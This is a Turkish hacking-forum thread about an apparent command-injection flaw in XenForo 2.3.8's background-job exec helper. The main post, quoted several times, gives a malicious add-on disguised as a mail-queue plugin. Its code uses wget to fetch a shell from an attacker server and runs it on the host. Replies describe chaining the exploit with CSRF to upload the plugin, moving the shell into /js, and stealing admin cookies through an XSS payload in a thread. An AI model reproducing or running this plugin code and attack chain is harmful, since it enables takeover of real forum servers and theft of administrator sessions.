Xenfro 2.38 altı açık (1 Viewer)

Th3columbia · Nis 14, 2026

Öncelikle admin yetkisi gerektirir XenForo'nun arka plan işleri için kullandığı bir fonksiyonda küçük ama kritik bir açık var. Anlatmaya çalışayım, belki sitenizde kontrol etmek istersiniz

---

Önce Temel Bilgi: XenForo Arka Plan İşleri Nasıl Çalışır?

XenForo'da bazı işlemler (mail gönderme, arama indeksleme vb.) hemen yapılmaz. Kuyruğa atılır, sonra `job.php` çalıştırır. Linux sunucularda bu işlemler için `nohup` komutu kullanılıyor.

Örnek:

```
nohup php /home/ornek.com/public_html/cmd.php > /dev/null 2>&1 &
```

Bu komut, `cmd.php` dosyasını arka planda çalıştırır ve çıktıyı çöpe atar.

---

Sorun Ne?

`src/XF/Util/Exec.php` dosyasındaki `executeAsyncCommand` fonksiyonuna bakalım:

```php
public static function executeAsyncCommand($command, ...$args)
{
if ($args) {
$command = vsprintf($command, array_map('escapeshellarg', $args));
}
// Eğer $args boşsa, $command olduğu gibi kalır!

exec("nohup $command > /dev/null 2>&1 &");
}
```

Gördüğünüz gibi, eğer fonksiyon ikinci parametre olmadan çağrılırsa (`$args` boşsa), `$command` değişkeni hiç kontrol edilmeden doğrudan shell komutuna ekleniyor.

---

Gerçek Senaryo: örnek.com Üzerinden

Diyelim ki `örnek.com` forumunuz var. Bir saldırgan (admin hesabına erişerek) şöyle bir eklenti yükledi:

Eklenti adı: "Advanced Mail Queue" (masum görünümlü)

Eklenti içindeki zararlı kod:

```php
// Dosya: src/addons/MailQueue/Service/Mailer.php

public function sendBulkEmails()
{
// Normalde mail gönderme işi yapıyormuş gibi görünür

$evilCommand = "wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php";

// Burada kritik nokta: ikinci parametre yok!
\XF\Util\Exec::executeAsyncCommand($evilCommand);
}
```

Ne oluyor sunucuda?

```
1. Eklenti çalıştırılır
2. Exec.php'ye şu komut gider: "wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php"
3. $args boş olduğu için escapeshellarg ÇALIŞMAZ
4. Sunucuda şu komut çalışır:
nohup wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php > /dev/null 2>&1 &
```

Sonuç: Saldırganın shell.txt dosyası indirilir ve çalıştırılır. Artık saldırgan sunucunuza uzaktan erişebilir.

---

Th3columbia · Nis 14, 2026

Th3columbia' Alıntı:
Öncelikle admin yetkisi gerektirir XenForo'nun arka plan işleri için kullandığı bir fonksiyonda küçük ama kritik bir açık var. Anlatmaya çalışayım, belki sitenizde kontrol etmek istersiniz

---

Önce Temel Bilgi: XenForo Arka Plan İşleri Nasıl Çalışır?

XenForo'da bazı işlemler (mail gönderme, arama indeksleme vb.) hemen yapılmaz. Kuyruğa atılır, sonra `job.php` çalıştırır. Linux sunucularda bu işlemler için `nohup` komutu kullanılıyor.

Örnek:

```
nohup php /home/ornek.com/public_html/cmd.php > /dev/null 2>&1 &
```

Bu komut, `cmd.php` dosyasını arka planda çalıştırır ve çıktıyı çöpe atar.

---

Sorun Ne?

`src/XF/Util/Exec.php` dosyasındaki `executeAsyncCommand` fonksiyonuna bakalım:

```php
public static function executeAsyncCommand($command, ...$args)
{
if ($args) {
$command = vsprintf($command, array_map('escapeshellarg', $args));
}
// Eğer $args boşsa, $command olduğu gibi kalır!

exec("nohup $command > /dev/null 2>&1 &");
}
```

Gördüğünüz gibi, eğer fonksiyon ikinci parametre olmadan çağrılırsa (`$args` boşsa), `$command` değişkeni hiç kontrol edilmeden doğrudan shell komutuna ekleniyor.

---

Gerçek Senaryo: örnek.com Üzerinden

Diyelim ki `örnek.com` forumunuz var. Bir saldırgan (admin hesabına erişerek) şöyle bir eklenti yükledi:

Eklenti adı: "Advanced Mail Queue" (masum görünümlü)

Eklenti içindeki zararlı kod:

```php
// Dosya: src/addons/MailQueue/Service/Mailer.php

public function sendBulkEmails()
{
// Normalde mail gönderme işi yapıyormuş gibi görünür

$evilCommand = "wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php";

// Burada kritik nokta: ikinci parametre yok!
\XF\Util\Exec::executeAsyncCommand($evilCommand);
}
```

Ne oluyor sunucuda?

```
1. Eklenti çalıştırılır
2. Exec.php'ye şu komut gider: "wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php"
3. $args boş olduğu için escapeshellarg ÇALIŞMAZ
4. Sunucuda şu komut çalışır:
nohup wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php > /dev/null 2>&1 &
```

Sonuç: Saldırganın shell.txt dosyası indirilir ve çalıştırılır. Artık saldırgan sunucunuza uzaktan erişebilir.

---

Bu sorun hangi sürümlerde var bilmiyorum tam olarak ama incelediğim 2.38 de vardı

𝖒𝖊𝖍𝖒𝖊𝖙𝟎𝐱𝟕 · Nis 14, 2026

kardesim acıgı somurmek icin admin olmam gerekiyosa acıgı ne yapayım amk admin olduktan sonra çee

eline saglık

revoNzy · Nis 15, 2026

bayadır bu tarz açıklar bulunuyor xenforoda fixlendimi bilgim yok

https://imhateam.org/forum/threads/yeni-xenforo-2-2-13-zip-slip-exploit-2024.24409/

Root Axus · Nis 15, 2026

Th3columbia' Alıntı:
Bu sorun hangi sürümlerde var bilmiyorum tam olarak ama incelediğim 2.38 de vardı

2.3.8 de dahil, 2.3.9 da fix

Root Axus · Nis 15, 2026

revoNzy' Alıntı:
bayadır bu tarz açıklar bulunuyor xenforoda fixlendimi bilgim yok

https://imhateam.org/forum/threads/yeni-xenforo-2-2-13-zip-slip-exploit-2024.24409/

Evet 2.3.9 da fix zaten, 2.3.10 baya iyi duruyor sağlam bir şeyler yapmışlar ama detaylı bakmak gerekir

Root Axus · Nis 15, 2026

Th3columbia' Alıntı:
Öncelikle admin yetkisi gerektirir XenForo'nun arka plan işleri için kullandığı bir fonksiyonda küçük ama kritik bir açık var. Anlatmaya çalışayım, belki sitenizde kontrol etmek istersiniz

---

Önce Temel Bilgi: XenForo Arka Plan İşleri Nasıl Çalışır?

XenForo'da bazı işlemler (mail gönderme, arama indeksleme vb.) hemen yapılmaz. Kuyruğa atılır, sonra `job.php` çalıştırır. Linux sunucularda bu işlemler için `nohup` komutu kullanılıyor.

Örnek:

```
nohup php /home/ornek.com/public_html/cmd.php > /dev/null 2>&1 &
```

Bu komut, `cmd.php` dosyasını arka planda çalıştırır ve çıktıyı çöpe atar.

---

Sorun Ne?

`src/XF/Util/Exec.php` dosyasındaki `executeAsyncCommand` fonksiyonuna bakalım:

```php
public static function executeAsyncCommand($command, ...$args)
{
if ($args) {
$command = vsprintf($command, array_map('escapeshellarg', $args));
}
// Eğer $args boşsa, $command olduğu gibi kalır!

exec("nohup $command > /dev/null 2>&1 &");
}
```

Gördüğünüz gibi, eğer fonksiyon ikinci parametre olmadan çağrılırsa (`$args` boşsa), `$command` değişkeni hiç kontrol edilmeden doğrudan shell komutuna ekleniyor.

---

Gerçek Senaryo: örnek.com Üzerinden

Diyelim ki `örnek.com` forumunuz var. Bir saldırgan (admin hesabına erişerek) şöyle bir eklenti yükledi:

Eklenti adı: "Advanced Mail Queue" (masum görünümlü)

Eklenti içindeki zararlı kod:

```php
// Dosya: src/addons/MailQueue/Service/Mailer.php

public function sendBulkEmails()
{
// Normalde mail gönderme işi yapıyormuş gibi görünür

$evilCommand = "wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php";

// Burada kritik nokta: ikinci parametre yok!
\XF\Util\Exec::executeAsyncCommand($evilCommand);
}
```

Ne oluyor sunucuda?

```
1. Eklenti çalıştırılır
2. Exec.php'ye şu komut gider: "wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php"
3. $args boş olduğu için escapeshellarg ÇALIŞMAZ
4. Sunucuda şu komut çalışır:
nohup wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php > /dev/null 2>&1 &
```

Sonuç: Saldırganın shell.txt dosyası indirilir ve çalıştırılır. Artık saldırgan sunucunuza uzaktan erişebilir.

---

Lakin addons yani eklenti gibi gösterip Upload ettiğin Shell'i /js ye kopyalicak bir sistemde ekle exploite ben o şekilde yaptım direk /js klasörüne çakmıyor sistem mesajı gibi sisteme gönderiyor sistem addons bölümünden /js ye Kendi taşıyor.

Root Axus · Nis 15, 2026

Aslında ya ben kaçırdım yada sen atladın

(admin hesabına erişerek) Dikkatimi çekti burda csrf açığını vurguladın sanırsam doğru mu ?

Root Axus · Nis 15, 2026

Açığın mevzusu token saklamamasi bu sayede xss ve csrf oluşturuyor, bizde admin token ile csrf ile işte addons.zip i Upload ediyoruz bu gadar (xss neyden kaynaklanıyor onu tam hatırlamıyorum)

Root Axus · Nis 15, 2026

Bahsetmeyi unutmuşum, admin.php ye o tarayıcıdan giriş yapması gerek hani csrf açığı ya token yoksa nasıl .zip o Upload etsin yoksa

Root Axus · Nis 15, 2026

Root Axus · Nis 15, 2026

Şimdi derseniz kendi local ortamın cors derdi yok diye, payloadda ufak bir değişime gidin, ise yaradığını anlicaksiniz.

moripro · Nis 15, 2026

Th3columbia' Alıntı:
Öncelikle admin yetkisi gerektirir XenForo'nun arka plan işleri için kullandığı bir fonksiyonda küçük ama kritik bir açık var. Anlatmaya çalışayım, belki sitenizde kontrol etmek istersiniz

---

Önce Temel Bilgi: XenForo Arka Plan İşleri Nasıl Çalışır?

XenForo'da bazı işlemler (mail gönderme, arama indeksleme vb.) hemen yapılmaz. Kuyruğa atılır, sonra `job.php` çalıştırır. Linux sunucularda bu işlemler için `nohup` komutu kullanılıyor.

Örnek:

```
nohup php /home/ornek.com/public_html/cmd.php > /dev/null 2>&1 &
```

Bu komut, `cmd.php` dosyasını arka planda çalıştırır ve çıktıyı çöpe atar.

---

Sorun Ne?

`src/XF/Util/Exec.php` dosyasındaki `executeAsyncCommand` fonksiyonuna bakalım:

```php
public static function executeAsyncCommand($command, ...$args)
{
if ($args) {
$command = vsprintf($command, array_map('escapeshellarg', $args));
}
// Eğer $args boşsa, $command olduğu gibi kalır!

exec("nohup $command > /dev/null 2>&1 &");
}
```

Gördüğünüz gibi, eğer fonksiyon ikinci parametre olmadan çağrılırsa (`$args` boşsa), `$command` değişkeni hiç kontrol edilmeden doğrudan shell komutuna ekleniyor.

---

Gerçek Senaryo: örnek.com Üzerinden

Diyelim ki `örnek.com` forumunuz var. Bir saldırgan (admin hesabına erişerek) şöyle bir eklenti yükledi:

Eklenti adı: "Advanced Mail Queue" (masum görünümlü)

Eklenti içindeki zararlı kod:

```php
// Dosya: src/addons/MailQueue/Service/Mailer.php

public function sendBulkEmails()
{
// Normalde mail gönderme işi yapıyormuş gibi görünür

$evilCommand = "wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php";

// Burada kritik nokta: ikinci parametre yok!
\XF\Util\Exec::executeAsyncCommand($evilCommand);
}
```

Ne oluyor sunucuda?

```
1. Eklenti çalıştırılır
2. Exec.php'ye şu komut gider: "wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php"
3. $args boş olduğu için escapeshellarg ÇALIŞMAZ
4. Sunucuda şu komut çalışır:
nohup wget http://saldiri-sunucusu.com/shell.txt -O /tmp/shell.php && php /tmp/shell.php > /dev/null 2>&1 &
```

Sonuç: Saldırganın shell.txt dosyası indirilir ve çalıştırılır. Artık saldırgan sunucunuza uzaktan erişebilir.

---

eline saglık fakat plugin yukleme zaten acıksa evil plugin seklinde kendi webshellini koyup kolayca sunucuya girebilirsin, ki buna karşı önlem şuana kadar hala alınmadı son sürümde dahil ki almasıda pek mümkün değil runtimeda kontrolü yapılmalı ve cidden iyi yapılmalıdır php içeriği zararlımı yoksa düzgünmü olayı ve çok fazla false positive çıkacaktır böyle bir olayda dümdüz şart kosulları ile kontrol yapmak

EFETR · Nis 15, 2026

eline sağlık hala şu güncel olan 0day açığını paylaşan görmedim
konu açıp xss payloadını gömüyorsun konuya sonra onaya düştüğü için konular (genel olarak forumlarda) admin gördüğü an çerezi sana düşüyor
widget açığı olarak geçiyor piyasada
2.2.18 ve 2.3.9 altındaki versionlar açıklıymış

https://xenforo.com/community/threads/xenforo-2-3-9-inc-xfmg-2-2-18-released-security-fix.235659/

https://www.vulncheck.com/advisories/xenforo-cross-site-scripting-via-lightbox-in-posts

Root Axus · Nis 15, 2026

EFETR' Alıntı:
eline sağlık hala şu güncel olan 0day açığını paylaşan görmedim
konu açıp xss payloadını gömüyorsun konuya sonra onaya düştüğü için konular (genel olarak forumlarda) admin gördüğü an çerezi sana düşüyor
widget açığı olarak geçiyor piyasada
2.2.18 ve 2.3.9 altındaki versionlar açıklıymış

https://xenforo.com/community/threads/xenforo-2-3-9-inc-xfmg-2-2-18-released-security-fix.235659/

https://www.vulncheck.com/advisories/xenforo-cross-site-scripting-via-lightbox-in-posts

Sadece widget değil mevzu

Xenfro 2.38 altı açık (1 Viewer)

Bu konuyu görüntüleyen kullanıcılar